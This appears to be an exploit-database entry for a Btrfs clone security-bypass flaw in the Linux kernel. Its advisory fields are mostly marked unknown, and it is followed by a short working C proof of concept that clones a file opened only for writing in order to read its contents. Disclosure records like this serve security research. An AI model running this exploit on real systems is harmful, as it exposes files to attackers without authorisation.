Btrfs Filesystem Clone Security Bypass Vulnerability

vendor:

Btrfs Filesystem

by:

Unknown

N/A

CVSS

N/A

Security Bypass

Unknown

CWE

Product Name: Btrfs Filesystem

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Linux

Unknown

Btrfs Filesystem Clone Security Bypass Vulnerability

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation. An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks.

Mitigation:

Unknown

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/40241/info

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. 
*/

#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>

#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

int main(int argc, char * argv[])
{

  if(argc < 3) {
    printf("Usage: %s [target] [output]\n", argv[0]);
    exit(-1);
  }

  int output = open(argv[2], O_WRONLY | O_CREAT, 0644);

  /* Note - opened for writing, not reading */
  int target = open(argv[1], O_WRONLY);

  ioctl(output, BTRFS_IOC_CLONE, target);

}